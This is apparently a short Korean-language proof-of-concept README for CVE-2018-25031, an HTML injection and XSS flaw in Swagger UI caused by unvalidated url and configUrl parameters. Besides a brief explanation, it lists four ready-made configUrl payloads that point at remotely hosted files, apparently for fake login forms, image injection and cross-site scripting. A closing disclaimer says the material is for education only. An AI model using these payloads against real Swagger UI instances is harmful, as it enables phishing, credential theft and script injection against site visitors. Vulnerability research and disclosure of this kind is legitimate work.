
Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].
Swagger UI는 OpenAPI(이전 명칭 Swagger) 명세를 대화형 웹 인터페이스로 렌더링하는 널리 사용되는 라이브러리입니다. 이를 통해 개발자와 통합자는 백엔드 구현 없이도 API를 탐색하고 테스트할 수 있습니다.
이 취약점은 Swagger UI 클라이언트가 원격 설정 또는 명세 파일을 로드하는 데 사용하는 URL 쿼리 매개변수의 유효성 검사가 불충분하여 발생합니다. 관련된 일반적인 매개변수는 다음과 같습니다.
?url=.yaml?configUrl=.json공격자는 이러한 매개변수를 원격으로 호스팅되는 공격자 제어 OpenAPI 정의 또는 설정 파일을 가리키도록 할 수 있으며, 이는 취약한 인스턴스에서 렌더링될 수 있습니다.
악성 원격 파일을 로드하면 호스팅 구성 및 적용된 보호 조치에 따라 여러 가지 영향력이 큰 결과가 발생할 수 있습니다.
참고 자료:
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json
이 저장소의 콘텐츠는 교육 및 정보 제공 목적으로만 제공됩니다. 작성자는 어떠한 오용에 대해서도 책임을 지지 않습니다. 사용 전에 적절한 권한을 확인하고, 책임감 있게 행동하며, 모든 법적 및 윤리적 지침을 준수하시기 바랍니다.